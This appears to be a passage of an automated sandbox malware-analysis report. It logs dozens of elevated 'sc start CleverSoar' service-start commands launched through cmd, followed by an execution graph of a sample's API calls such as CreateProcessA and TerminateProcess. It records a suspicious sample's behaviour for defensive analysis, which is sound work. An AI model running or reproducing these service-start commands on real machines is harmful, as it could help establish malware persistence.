                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:60
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:61
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:62
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:63
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:64
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:65
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:66
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:67
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:68
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:70
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:71
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:72
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:73
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:74
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:75
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:76
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:77
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:78
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:79
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:80
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:81
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:82
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:83
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:84
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:85
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:86
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:87
                          Start time:00:23:42
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:88
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:89
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:90
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:91
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:92
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:93
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:94
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:95
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:96
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:97
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:98
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:99
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:100
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:101
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:102
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:103
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:104
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:105
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:106
                          Start time:00:23:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:1.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:15.5%
                            Total number of Nodes:792
                            Total number of Limit Nodes:13
                            execution_graph 100252 6cc6cad3 100253 6cc6cafd 100252->100253 100254 6cc6cae5 __dosmaperr 100252->100254 100253->100254 100256 6cc6cb48 __dosmaperr 100253->100256 100257 6cc6cb77 100253->100257 100299 6cc60120 18 API calls __fassign 100256->100299 100258 6cc6cb90 100257->100258 100259 6cc6cbab __dosmaperr 100257->100259 100261 6cc6cbe7 __wsopen_s 100257->100261 100258->100259 100279 6cc6cb95 100258->100279 100292 6cc60120 18 API calls __fassign 100259->100292 100293 6cc647bb HeapFree GetLastError __dosmaperr 100261->100293 100262 6cc6cd3e 100265 6cc6cdb4 100262->100265 100269 6cc6cd57 GetConsoleMode 100262->100269 100268 6cc6cdb8 ReadFile 100265->100268 100266 6cc6cc07 100294 6cc647bb HeapFree GetLastError __dosmaperr 100266->100294 100271 6cc6cdd2 100268->100271 100272 6cc6ce2c GetLastError 100268->100272 100269->100265 100273 6cc6cd68 100269->100273 100270 6cc6cc0e 100285 6cc6cbc2 __dosmaperr __wsopen_s 100270->100285 100295 6cc6ac69 20 API calls __wsopen_s 100270->100295 100271->100272 100274 6cc6cda9 100271->100274 100272->100285 100273->100268 100275 6cc6cd6e ReadConsoleW 100273->100275 100280 6cc6cdf7 100274->100280 100281 6cc6ce0e 100274->100281 100274->100285 100275->100274 100278 6cc6cd8a GetLastError 100275->100278 100278->100285 100287 6cc719e5 100279->100287 100297 6cc6cefe 23 API calls 3 library calls 100280->100297 100283 6cc6ce25 100281->100283 100281->100285 100298 6cc6d1b6 21 API calls __wsopen_s 100283->100298 100296 6cc647bb HeapFree GetLastError __dosmaperr 100285->100296 100286 6cc6ce2a 100286->100285 100289 6cc719f2 100287->100289 100290 6cc719ff 100287->100290 100288 6cc71a0b 100288->100262 100289->100262 100290->100288 100300 6cc60120 18 API calls __fassign 100290->100300 100292->100285 100293->100266 100294->100270 100295->100279 100296->100254 100297->100285 100298->100286 100299->100254 100300->100289 100301 6cae4a27 100305 6cae4a5d _strlen 100301->100305 100302 6caf639e 100433 6cc60130 18 API calls 2 library 
calls 100302->100433 100303 6cae5b6f 100307 6cc56a43 std::_Facet_Register 4 API calls 100303->100307 100304 6cae5b58 100419 6cc56a43 100304->100419 100305->100302 100305->100303 100305->100304 100309 6cae5b09 _Yarn 100305->100309 100307->100309 100392 6cc4aec0 100309->100392 100312 6cae5bad std::ios_base::_Ios_base_dtor 100312->100302 100315 6cae9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100312->100315 100398 6cc54ff0 CreateProcessA 100312->100398 100313 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100313->100315 100314 6cc4aec0 2 API calls 100314->100315 100315->100302 100315->100313 100315->100314 100316 6caea292 Sleep 100315->100316 100336 6caee619 100315->100336 100334 6cae9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100316->100334 100317 6cae660d 100319 6cc56a43 std::_Facet_Register 4 API calls 100317->100319 100318 6cae6624 100320 6cc56a43 std::_Facet_Register 4 API calls 100318->100320 100329 6cae65bc _Yarn _strlen 100319->100329 100320->100329 100321 6cae61cb _strlen 100321->100302 100321->100317 100321->100318 100321->100329 100322 6cc54ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100322->100334 100323 6cae9bbd GetCurrentProcess TerminateProcess 100323->100315 100324 6caf63b2 100434 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 100324->100434 100326 6caf64f8 100327 6cae6989 100331 6cc56a43 std::_Facet_Register 4 API calls 100327->100331 100328 6cae6970 100330 6cc56a43 std::_Facet_Register 4 API calls 100328->100330 100329->100324 100329->100327 100329->100328 100332 6cae6920 _Yarn 100329->100332 100330->100332 100331->100332 100402 6cc55960 100332->100402 100334->100302 100334->100315 100334->100322 100334->100323 100334->100324 100376 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100334->100376 100382 6cc55960 104 API calls 100334->100382 100335 6caef243 CreateFileA 100351 6caef2a7 
100335->100351 100336->100335 100337 6cae69d6 std::ios_base::_Ios_base_dtor _strlen 100337->100302 100338 6cae6dbb 100337->100338 100339 6cae6dd2 100337->100339 100345 6cae6d69 _Yarn _strlen 100337->100345 100340 6cc56a43 std::_Facet_Register 4 API calls 100338->100340 100341 6cc56a43 std::_Facet_Register 4 API calls 100339->100341 100340->100345 100341->100345 100342 6caf02ca 100343 6cae7427 100346 6cc56a43 std::_Facet_Register 4 API calls 100343->100346 100344 6cae7440 100347 6cc56a43 std::_Facet_Register 4 API calls 100344->100347 100345->100324 100345->100343 100345->100344 100348 6cae73da _Yarn 100345->100348 100346->100348 100347->100348 100349 6cc55960 104 API calls 100348->100349 100352 6cae748d std::ios_base::_Ios_base_dtor _strlen 100349->100352 100350 6caf02ac GetCurrentProcess TerminateProcess 100350->100342 100351->100342 100351->100350 100352->100302 100353 6cae79a8 100352->100353 100354 6cae7991 100352->100354 100357 6cae7940 _Yarn _strlen 100352->100357 100356 6cc56a43 std::_Facet_Register 4 API calls 100353->100356 100355 6cc56a43 std::_Facet_Register 4 API calls 100354->100355 100355->100357 100356->100357 100357->100324 100358 6cae7dc9 100357->100358 100359 6cae7de2 100357->100359 100360 6cae7d7c _Yarn 100357->100360 100361 6cc56a43 std::_Facet_Register 4 API calls 100358->100361 100362 6cc56a43 std::_Facet_Register 4 API calls 100359->100362 100363 6cc55960 104 API calls 100360->100363 100361->100360 100362->100360 100364 6cae7e2f std::ios_base::_Ios_base_dtor _strlen 100363->100364 100364->100302 100365 6cae85bf 100364->100365 100366 6cae85a8 100364->100366 100374 6cae8556 _Yarn _strlen 100364->100374 100368 6cc56a43 std::_Facet_Register 4 API calls 100365->100368 100367 6cc56a43 std::_Facet_Register 4 API calls 100366->100367 100367->100374 100368->100374 100369 6cae896a 100371 6cc56a43 std::_Facet_Register 4 API calls 100369->100371 100370 6cae8983 100372 6cc56a43 std::_Facet_Register 4 API calls 100370->100372 100373 6cae891d _Yarn 
100371->100373 100372->100373 100375 6cc55960 104 API calls 100373->100375 100374->100324 100374->100369 100374->100370 100374->100373 100377 6cae89d0 std::ios_base::_Ios_base_dtor _strlen 100375->100377 100376->100334 100377->100302 100378 6cae8f1f 100377->100378 100379 6cae8f36 100377->100379 100383 6cae8ecd _Yarn _strlen 100377->100383 100380 6cc56a43 std::_Facet_Register 4 API calls 100378->100380 100381 6cc56a43 std::_Facet_Register 4 API calls 100379->100381 100380->100383 100381->100383 100382->100334 100383->100324 100384 6cae936d 100383->100384 100385 6cae9354 100383->100385 100388 6cae9307 _Yarn 100383->100388 100387 6cc56a43 std::_Facet_Register 4 API calls 100384->100387 100386 6cc56a43 std::_Facet_Register 4 API calls 100385->100386 100386->100388 100387->100388 100389 6cc55960 104 API calls 100388->100389 100391 6cae93ba std::ios_base::_Ios_base_dtor 100389->100391 100390 6cc54ff0 4 API calls 100390->100315 100391->100302 100391->100390 100393 6cc4aed4 100392->100393 100394 6cc4aed6 FindFirstFileA 100392->100394 100393->100394 100395 6cc4af10 100394->100395 100396 6cc4af14 FindClose 100395->100396 100397 6cc4af72 100395->100397 100396->100395 100397->100312 100399 6cc550ca 100398->100399 100400 6cc55080 WaitForSingleObject CloseHandle CloseHandle 100399->100400 100401 6cc550e3 100399->100401 100400->100399 100401->100321 100403 6cc559b7 100402->100403 100435 6cc55ff0 100403->100435 100405 6cc559c8 100454 6caf6ba0 100405->100454 100408 6cc55a9f std::ios_base::_Ios_base_dtor 100411 6cb1e010 67 API calls 100408->100411 100410 6cc559ec 100412 6cc55a54 100410->100412 100418 6cc55a67 100410->100418 100473 6cc56340 100410->100473 100481 6cb32000 100410->100481 100415 6cc55ae2 std::ios_base::_Ios_base_dtor 100411->100415 100491 6cc55b90 100412->100491 100415->100337 100416 6cc55a5c 100512 6caf7090 100416->100512 100506 6cb1e010 100418->100506 100421 6cc56a48 100419->100421 100420 6cc56a62 100420->100309 100421->100420 100424 6cc56a64 std::_Facet_Register 
100421->100424 100965 6cc5f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100421->100965 100423 6cc578c3 std::_Facet_Register 100969 6cc59379 RaiseException 100423->100969 100424->100423 100966 6cc59379 RaiseException 100424->100966 100426 6cc580bc IsProcessorFeaturePresent 100432 6cc580e1 100426->100432 100428 6cc57883 100967 6cc59379 RaiseException 100428->100967 100430 6cc578a3 std::invalid_argument::invalid_argument 100968 6cc59379 RaiseException 100430->100968 100432->100309 100434->100326 100436 6cc56025 100435->100436 100525 6cb22020 100436->100525 100438 6cc560c6 100439 6cc56a43 std::_Facet_Register 4 API calls 100438->100439 100440 6cc560fe 100439->100440 100542 6cc57327 100440->100542 100442 6cc56112 100554 6cb21d90 100442->100554 100445 6cc561ec 100445->100405 100447 6cc56226 100562 6cb226e0 24 API calls 4 library calls 100447->100562 100449 6cc56238 100563 6cc59379 RaiseException 100449->100563 100451 6cc5624d 100452 6cb1e010 67 API calls 100451->100452 100453 6cc5625f 100452->100453 100453->100405 100455 6caf6bd5 100454->100455 100456 6cb22020 52 API calls 100455->100456 100457 6caf6c68 100456->100457 100458 6cc56a43 std::_Facet_Register 4 API calls 100457->100458 100459 6caf6ca0 100458->100459 100460 6cc57327 43 API calls 100459->100460 100461 6caf6cb4 100460->100461 100462 6cb21d90 89 API calls 100461->100462 100464 6caf6d5d 100462->100464 100463 6caf6d8e 100463->100410 100464->100463 100873 6cb22250 30 API calls 100464->100873 100466 6caf6dc8 100874 6cb226e0 24 API calls 4 library calls 100466->100874 100468 6caf6dda 100875 6cc59379 RaiseException 100468->100875 100470 6caf6def 100471 6cb1e010 67 API calls 